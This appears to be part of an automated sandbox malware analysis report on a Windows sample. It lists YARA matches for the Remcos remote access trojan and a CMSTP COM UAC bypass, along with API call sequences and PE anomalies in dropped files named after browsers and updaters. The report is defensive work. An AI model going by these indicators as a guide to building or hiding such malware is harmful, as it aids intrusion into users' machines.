              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004333BE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004333BE
              Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\73722fd785394ff7.binJump to behavior
              Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: String function: 004115D7 appears 35 times
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: String function: 00445AE0 appears 65 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0040E710 appears 44 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00401B10 appears 50 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00408F40 appears 38 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004301F8 appears 36 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 72 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 78 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004181F2 appears 42 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 130 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 0041341F appears 36 times
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00422240 appears 36 times
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
              Source: Acrobat.exe.6.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: msedgewebview2.exe.6.drStatic PE information: Number of sections : 14 > 10
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: msedge_proxy.exe0.6.drStatic PE information: Number of sections : 12 > 10
              Source: pwahelper.exe0.6.drStatic PE information: Number of sections : 12 > 10
              Source: identity_helper.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: pwahelper.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: elevation_service.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: ie_to_edge_stub.exe.6.drStatic PE information: Number of sections : 11 > 10
              Source: msedge_proxy.exe.6.drStatic PE information: Number of sections : 12 > 10
              Source: elevation_service.exe0.6.drStatic PE information: Number of sections : 12 > 10
              Source: notification_click_helper.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: firefox.exe.6.drStatic PE information: Number of sections : 11 > 10
              Source: setup.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
              Source: tyRPPK48Mk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: default-browser-agent.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.132_chrome_installer.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info_x64.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.6.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
